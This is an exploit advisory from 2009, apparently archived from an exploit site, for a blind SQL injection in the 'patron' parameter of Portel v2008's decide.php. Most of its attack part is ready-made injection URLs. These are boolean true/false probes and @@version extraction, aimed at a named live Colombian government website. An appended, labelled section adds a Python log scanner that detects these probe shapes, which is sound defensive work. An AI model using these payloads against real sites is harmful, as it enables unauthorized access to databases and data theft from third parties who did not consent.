# Title : Portel v2008 (decide.php patron) Blind SQL Injection Vulnerability
# Published : 2009-08-05
# Author : Chip D3 Bi0s
------------------------------------------------------------------------------
Portel (patron) Blind SQL-injection Vulnerability
------------------------------------------------------------------------------
#####################################################
# [+] Author : Chip D3 Bi0s #
# [+] Email : chipdebios[alt+64]gmail.com #
# [+] Vulnerability : Blind SQL injection #
# [+] Group : LatinHackTeam #
#####################################################
**********************************************************************
CMS info:
* Name : Portel
* Web : http://www.porteleditor.com
* Download : http://www.porteleditor.com/instalacion/portelv2008.zip
http://rapidshare.com/files/263383411/portelv2008.zip.html
* Country : Colombia
**********************************************************************
Example:
http://localHost/path/libreria/php/decide.php?patron=n<blind SQL code>
n = a valid patron value
Live demo:
http://www.bogota.gov.co/portel/libreria/php/decide.php?patron=01.'+and+1=1/*
true
http://www.bogota.gov.co/portel/libreria/php/decide.php?patron=01.'+and+1=2/*
else
http://www.bogota.gov.co/portel/libreria/php/decide.php?patron=01.'+and+substring(@@version,1,1)=4/*
else
http://www.bogota.gov.co/portel/libreria/php/decide.php?patron=01.'+and+substring(@@version,1,1)=5/*
true
etc, etc....
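
Detection example (added here, not part of the original advisory): a log scan that matches the decide.php patron request shapes shown in the demo and flags clients whose flagged requests drew differing response sizes, which is the true/else oracle a blind injection relies on. The log lines, IP addresses and response sizes are constructed, and the names scan and blind_probe_clients are hypothetical.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines; IPs are documentation addresses, sizes are made up.
SAMPLE_LOG = """\
192.0.2.10 - - [05/Aug/2009:10:00:01 +0000] "GET /portel/libreria/php/decide.php?patron=01. HTTP/1.1" 200 512
198.51.100.7 - - [05/Aug/2009:10:00:05 +0000] "GET /portel/libreria/php/decide.php?patron=01.'+and+1=1/* HTTP/1.1" 200 512
198.51.100.7 - - [05/Aug/2009:10:00:06 +0000] "GET /portel/libreria/php/decide.php?patron=01.'+and+1=2/* HTTP/1.1" 200 87
198.51.100.7 - - [05/Aug/2009:10:00:07 +0000] "GET /portel/libreria/php/decide.php?patron=01.'+and+substring(@@version,1,1)=5/* HTTP/1.1" 200 512
192.0.2.10 - - [05/Aug/2009:10:00:09 +0000] "GET /portel/index.php?id=3 HTTP/1.1" 200 2048
"""

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3}) (\d+)')
# Indicators: the /* comment, quote, boolean test and @@version shapes from the advisory,
# plus the other SQL comment openers (-- and #).
INDICATORS = {
    "quote": re.compile(r"'"),
    "comment": re.compile(r"/\*|--|#"),
    "boolean": re.compile(r"\b(?:and|or)\b\s+\S+\s*=\s*\S+", re.I),
    "fingerprint": re.compile(r"@@version|substring\s*\(", re.I),
}

def scan(log_text, script="decide.php", param="patron"):
    """Return {client_ip: [(decoded_value, [indicator names], response_bytes), ...]}."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        ip, target, _status, size = m.groups()
        url = urlsplit(target)
        if not url.path.endswith("/" + script):
            continue
        # parse_qs URL-decodes the value and turns '+' into a space before matching.
        for value in parse_qs(url.query).get(param, []):
            found = [name for name, rx in INDICATORS.items() if rx.search(value)]
            if found:
                hits[ip].append((value, found, int(size)))
    return dict(hits)

def blind_probe_clients(hits):
    """Clients whose flagged requests drew differing response sizes (true/else oracle)."""
    return sorted(ip for ip, rows in hits.items() if len({r[2] for r in rows}) > 1)
```
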
+++++++++++++++++++++++++++++++++++++++
#[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++
# www.Syue.com [2009-08-05]